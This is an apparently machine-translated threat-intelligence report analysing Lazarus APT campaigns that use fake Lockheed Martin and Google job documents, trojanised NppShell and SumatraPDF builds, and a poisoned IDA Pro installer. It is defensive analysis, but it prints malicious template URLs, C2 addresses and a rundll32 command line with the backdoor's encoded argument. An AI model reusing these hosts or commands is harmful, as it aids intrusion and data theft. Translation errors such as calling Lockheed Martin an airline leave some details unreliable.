1 Overview
Lazarus is a large overseas APT group organization suspected of having a national background, and the organization is good at using social engineering programs to carry out targeted attacks against government, scientific research, finance, aviation, cryptocurrencies and other institutions, and its main purpose is to steal important intelligence information and obtain economic benefits.
The Microbuds Intelligence Agency recently monitored Lazarus' targeted attacks against aviation and security researchers through a threat hunting system, and the analysis found the following:
- The attackers disguised the recruitment documents of the US "Lockheed Martin" airline and delivered decoy documents to the target to attack;
- The delivered document is finally loaded and executed with a malicious backdoor module to achieve remote control of the target host;
- At the same time, the same document template is used to make Google's recruitment bait documents for attack activities;
- Attackers modify the open source project NppShell to develop Trojans, which can evade some security software detection;
- Lazarus reused previous attack methods and modified the open source SumatraPDF reader to attack;
- In addition, the organization bundled malicious components into the IDA Pro installation package program to target security researchers;
- Through the traceability analysis of relevant samples, IP addresses and domain names, Microbud Online extracts multiple related IOCs, which can be used for threat intelligence detection. Microbud online threat awareness platform TDP, local threat intelligence management platform TIP, threat intelligence cloud API, Internet security access service OneDNS, host threat detection and response platform OneEDR, threat capture and deception system HFish honeypot, etc. have all supported the detection of this attack and gang.
2 Details
Lazarus's use of template injection to elaborately falsify relevant company recruitment documents has been a frequent occurrence in the organization's past attacks, in which we saw attackers impersonating Lockheed Martin Airlines and Google sending relevant decoy documents to targets.
Bait recruitment documents disguised as "Lockheed Martin" airlines
Decoy recruitment documents that disguise Google
At the same time, the open source PDF reader was also modified to send phishing documents to targets.
Lazarus modified PDF reader
In addition, the organization bundles malicious components into the IDA Pro installation package to conduct targeted attacks on security researchers, with the possible primary purpose of stealing high-value 0Day vulnerabilities in the hands of security researchers to augment the organization's arsenal.
3 Sample analysis
3.1 Camouflage the recruitment documentation of "Lockheed Martin" Airlines
The samples featured job descriptions from American Airlines Lockheed Martin as decoy documents.
Disguise the airline's recruitment documents
The sample uses template injection to load a malicious template file from a remote server.
URL:https://mantis.linkundlink.de/logs/officetemplate.php?templateID=3535
Template injection in bait documentation
When analyzing the sample, the server was no longer able to respond properly, but according to the associated information, a dll backdoor module should eventually be loaded, which was modified by the module NppShell in the open source project Notepad++, and its malicious process was in the export function DllGetFirstChild.
Export table for backdoor modules
The module must pass in the command line parameters with the word NTPR, and after entering the execution process, the parameter format will be checked and decrypted, and the parameters passed in during the actual execution are:
| NTPR P6k+pR6iIKwJpU6oR6ZilgKPL7IxsitJAnpIYSx2KldSSRFFyUIzTBVFAwgzBkI2PS/+EgASBik/GgYBwBbRNy7pP+Xq4uTsxOXU6NPmudaEz7Xy5fLQica6yKHvtu2XkYmnhfeC/4ythf9I6UbAdvxvy1K2Um5ppVrEQY9WiHdxKbolqiKgLMElwSiKJrcWrQ+cMpYy5cnc+s/hufap15LJmsVFwr7MlMWwiLCGgLZPr4uSk5KIqZiadYGOlkS3cml1ZZdiZmyzZVpovmZiVlNPNXJsck4JXzpPIWw2YBcqCRMFCQJBDG4FfchmxkL2fO8V0jbSTeko2u/BI9YA9zGpM6UWoiGsdaVdqAmmIpYHjzWyM7IOSQR6SGE4dilXB0lfRXtCOEwkRTAIMgYWNnsvVRJSEvQp/xryAdsW1Df76fjl3eIb7M7lIujH5vbW7c/ e8tTy2on1uuGh+rbml5GJp4X3gv+MrYXwSOFGzHbxb9BSwFLLaaJau0FNVoh3sim4JZYi1Cz1JZYohya0FpEP9TKZMpTJgvqn4e72sdefyZrF4sI= |
The C2 address decrypted from the command line arguments is as follows:
| https://mante.li/images/draw.php |
| https://bmanal.com/images/draw.php |
| https://shopandtravelusa.com/vendor/monolog/monolog/src/Monolog/monolog.php |
| https://industryinfostructure.com/templates/worldgroup/view.php |
The collection then includes the host network environment, host name, user name, and process list, which is compressed using RtlCompressBuffer.
Host information collected by the backdoor module
Upload the above host information to the C2 server in a POST method and receive the return data.
Download data from the server
Extracts payload data from the returned html-formatted data.
Extract payload data
After Xor decryption, respond to the server's remote instructions.
| Memory loading executes the PE module | |
| 1 | Download the Execute exe module |
| 2 | Download the execute dll module |
| 3 | Shellcode is executed in memory |
Responds to server remote instructions
During the analysis, another sample of the same kind was found, using a similar decoy document (ef2d3e488b781a7c614afa8fc8ba2b6d085ca61100d04686097f3b4dd2ed42) to load the Trojan module, which connects an intranet address for template loading.
URL:http://10.10.130.129:4080/down.php?id=2383
Load the template in the bait document
The released Trojan module is also modified using the open source project NppShell, when analyzing the sample, we observed that the detection rate of the sample in VirusTotal is very low, indicating that the attacker used this method to evade some security software detection.
Screenshot of the Trojan module in ViralTotal
3.2 Disguise Google's job documents
During the analysis, another sample was found to use a template similar to the bait document described above to disguise Google's recruitment document.
Disguise Google's job documentation
It also uses the template injection method to load a malicious template file from the server, and the templateID in the URL is consistent with the above sample format.
URL:https://www.canyonzcc.com/system/templates/template.php?templateID=1010
The server also failed to respond properly when the sample was parsed, but the associated information shows that it finally loaded and executed a dll module named "msxml3r.dll" and called its export function SHLocalServerDll.
Export table for Trojan modules
In the export function SHLocalServerDll, load a copy of its own module again in memory, call another export function, MSXMLParser, and then use the XOR algorithm to decrypt the C2 address: www.canyonzcc.com.
Decrypt the C2 address
Then send a fixed parameter page=admin&mode=product to the server every 60 seconds in a POST method to request the download of the data.
Communicate with the C2 server
After the downloaded data is decrypted by the AES algorithm, it responds to the server remote instruction and sends an echo of Success or Fail to the server, which is in the following format:
| List of processes | |
| 2/4 | Download the data |
Respond to C2 server remote commands
3.3 Modify the open source PDF reader
In addition, Lazarus has recently carried out attacks by modifying the open source project Sumatra PDF reader, which has appeared many times in Lazarus's previous attacks, which usually come with a bait pdf document, and once a specific pdf document is opened, it will perform malicious behavior, and the captured sample directly writes malicious code to the reader.
Malicious process entry in PDF readers
After opening the pdf document using the reader sample, determine whether the document MD5 is "a28a25fd2ab85a2fc69019412629e5c9", if not will not enter the malicious behavior, there is currently no corresponding pdf document information.
The PDF reader checks for specific documents in MD5
If so, put a28a25fd2ab85a2fc69019412629e5c9 into the SESSID field and initiate an HTTP GET request to the server, which is unable to respond.
URL:https://industryinfostructure.com/templates/pdfview.php
Initiate a network request to the C2 server
After that, the accepting server returns the data and decrypts it, according to whether the instruction overwrites the pdf file, and then requests the server to download the data decryption and save it as a temporary file with NoSessions, and the URL is also https://industryinfostructure.com/templates/pdfview.php.
Download the execution module from the C2 server
Finally, through rundll32.exe call executes the downloaded module, passing in the parameters as follows:
| DllGetFirstChild NTPR P6k+pR6iIKwJpU6oR6ZilgKPL7IxsitJAnpIYSx2KldSSRFFyUIzTBVFAwgzBkI2PS/+EgASBik/GgYBwBbRNy7pP+Xq4uTsxOXU6NPmudaEz7Xy5fLQica6yKHvtu2XkYmnhfeC/4ythf9I6UbAdvxvy1K2Um5ppVrEQY9WiHdxKbolqiKgLMElwSiKJrcWrQ+cMpYy5cnc+s/hufap15LJmsVFwr7MlMWwiLCGgLZPr4uSk5KIqZiadYGOlkS3cml1ZZdiZmyzZVpovmZiVlNPNXJsck4JXzpPIWw2YBcqCRMFCQJBDG4FfchmxkL2fO8V0jbSTeko2u/BI9YA9zGpM6UWoiGsdaVdqAmmIpYHjzWyM7IOSQR6SGE4dilXB0lfRXtCOEwkRTAIMgYWNnsvVRJSEvQp/xryAdsW1Df76fjl3eIb7M7lIujH5vbW7c/ e8tTy2on1uuGh+rbml5GJp4X3gv+MrYXwSOFGzHbxb9BSwFLLaaJau0FNVoh3sim4JZYi1Cz1JZYohya0FpEP9TKZMpTJgvqn4e72sdefyZrF4sI= |
Call rundll32 to execute the malicious module
Although the server cannot respond normally when analyzing the sample, the name of the export function and the command line parameters are consistent with the relevant samples of the camouflage airline analyzed above, and the subsequent execution process should be consistent with the above, and the C2 used should also be consistent, so it can be determined that it should be the same group of attackers.
3.4 Attack activities against security researchers
Recently, foreign security vendor ESET disclosed a Lazarus poisoning attack on security researchers, and the attacker bundled malicious components to the IDA Pro installation package. IDA Pro is hex-Rays' flagship product, meaning interactive disassembler pro, is one of the most popular static decompilation software, the user is mostly security researchers, some users due to the high price of the genuine and download and use pirated programs, Lazarus is taking advantage of this, targeted security researchers to carry out targeted attacks, the main purpose may be to steal high-value 0Day vulnerabilities in the hands of security researchers, to expand the organization's arsenal.
Relevant IDA installation package launch screen
An attacker replaces the internal component of the IDA Pro installation package with a malicious DLL win_fw.dll.
Malicious module in the file list
win_fw.dll will create a Windows scheduled task and start another malicious component, idahelper.dll.
The task schedule created by the malicious module
idahelper.dll will XOR decrypt URL: https://www.devguardmap.org/board/board_read.asp?boardid=01.
Idahelper decrypts the C2 address .dll
Call the URLOpenBlockingStream to download data from the server and load execution in memory.
Download the malicious payload from the server
The C2 server used in this sample overlaps (https://blog.google/threat-analysis-group/update-campaign-targeting-security-researchers) with the organization's previous attacks against security researchers, and is not a recent attack based on information such as the sample's compilation time. Micro-step online threat intelligence can accurately identify, the first time for customers to find relevant threats and deal with.
Screenshot of the C2 address in the Microbuds Online X community
4 Correlation analysis
Lazarus is adept at using social engineering schemes to infiltrate targets, and in October of this year, the organization disguised a cover letter from Incheon International Airport to conduct targeted attacks on the aviation industry, and recently also found that the organization's attacks on the aviation industry have also been found, which shows that the aviation industry is one of the long-term targets of lazarus.
The organization often uses template injection methods to create decoy documents, and last year it carried out an attack called "DreamJob" against the aviation industry, when it also produced decoy documents in the name of recruitment to carry out social worker attacks on targets, which is the same as the above attack activities, and there are many connections at the sample level, such as almost the same memory loading PE part.
Past attacks
Sample of this attack activity
The organization is good at modifying open source projects to carry out camouflage attacks, and has repeatedly modified the open source project SumatraPDF reader in previous attack activities to deliver phishing documents to targets, which is highly consistent with the sample of this attack.
Sumatra PDF reader modified in previous attacks
This attack modified the Sumatra PDF reader
5 Conclusion
Combined with the above analysis information, it can be found that the aviation industry has been one of the long-term targets of the Lazarus organization, its habitual use of social engineering to attack targets, sending decoy documents to targets in the name of recruitment is one of its usual attack methods, and the organization will also modify open source projects such as PDF readers to improve Trojan concealment. In addition, the organization will also target security researchers to carry out targeted attacks, which is relatively rare in APT attack activities, micro-step intelligence bureau will continue to track related attack activities, timely detection of security threats and rapid response to deal with.
Click on the link below to get the full PDF report: "Link"